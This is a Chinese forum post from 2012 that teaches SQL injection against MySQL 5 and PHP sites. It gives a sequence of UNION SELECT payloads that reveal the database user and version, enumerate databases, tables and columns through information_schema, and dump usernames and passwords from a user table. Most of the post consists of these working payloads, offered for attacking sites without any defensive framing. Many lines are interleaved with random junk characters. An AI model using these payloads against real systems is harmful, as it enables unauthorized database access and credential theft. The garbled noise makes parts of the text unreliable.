T" F' ]* S+ z8 j, i3 F. Z
教程内容:Mysql 5+php 注入
5 u7 [4 L* n/ C) z- M+ ?7 L9 X3 o
8 Y) Q% x( ~6 e& C' U( L6 N
5 u4 h1 s% B0 a& ] i* i一.查看MYSQL基本信息(库名,版本,用户)4 T# C3 [/ p q+ S5 g6 K
/ t. D0 e8 r& U* [" R( Iand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
6 d+ o @# u* X, q
8 b1 p& D; Y/ d5 d! r7 d二.查数据库
& V {$ b/ J3 Z+ g6 a6 F% m$ u1 Y! q. ^# Y0 N9 o+ F3 r
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*$ Y' U6 V/ G8 f$ m* C3 o
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
1 m# b- h9 E$ r% \3 i! w/ b$ L
三.暴表$ b+ m$ v# Z, k/ ^5 D7 a, S- Y
- O5 h, Q8 R* [( R0 K# ^3 T5 D" ~. Q xand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*! {, |7 O4 ?1 N2 \" H) Y9 P# Y5 s
2 H# c5 Q: p* U1 `+ e, Vlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
, w1 a- r$ r( }/ V: Q% n
% [4 \ Y5 N9 S+ t. |四.暴字段
1 Z( v7 W: q9 J( C
7 w9 W! F7 S9 a2 o; xand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*, W9 U5 {3 L9 Q
: i# W/ K# t) X3 e D* g* w
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。 }, s4 s7 ~# k$ y8 x2 [- n
& `0 q3 n& [- r7 s$ J五.暴数据
$ B) s' x- c6 R" R! e3 d, i+ h8 L. S1 E
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*& k3 K- R6 Y4 b( F& U: u5 H: Q1 O
# S7 q; H& ^3 f2 n
~( F1 T' N# m0 M这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
( N! n4 u. H5 [5 W% W+ } t3 I |
发表于 2012-9-13 16:27:53
收藏
支持
反对